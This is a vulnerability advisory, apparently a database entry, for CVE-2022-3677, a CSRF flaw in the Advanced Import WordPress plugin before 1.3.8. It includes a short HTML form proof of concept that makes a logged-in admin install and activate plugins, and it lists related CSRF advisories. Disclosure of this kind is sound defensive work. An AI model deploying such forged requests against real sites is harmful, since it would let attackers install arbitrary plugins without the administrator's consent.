Advanced Import < 1.3.8 – Arbitrary Plugin Installation & Activation via CSRF | CVE 2022-3677 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when installing and activating plugins, which could allow attackers to make a logged in admin install arbitrary plugins from WordPress.org, and activate arbitrary ones from the blog via CSRF attacks

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=install_plugin" method="POST">
    <input type="text" name="slug" value="hello-dolly">
    <input type="text" name="plugin" value="hello-dolly/hello.php">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

advanced-import

Fixed in 1.3.8

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

5a7c6367-a3e6-4411-8865-2a9dbc9f1450

Timeline

Publicly Published

2022-11-14 (about 3 years ago)

Added

2022-11-14 (about 3 years ago)

Last Updated

2022-11-14 (about 3 years ago)

Other

Published

Title

Published

2023-10-19

Title

Auto Login New User After Registration <= 1.9.6 - CSRF

Published

2025-02-24

Title

WordPress File Upload < 4.25.3 - Cross-Site Request Forgery in wfu_file_details

Published

2020-11-19

Title

Contextual Related Posts < 2.9.4 - CSRF Nonce Validation Bypass

Published

2024-03-05

Title

Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin < 1.6.6.24 - Cross-Site Request Forgery to Plugin Data Reset

Published

2024-02-26

Title

Categorify < 1.0.7.5 - Cross-Site Request Forgery via categorifyAjaxAddCategory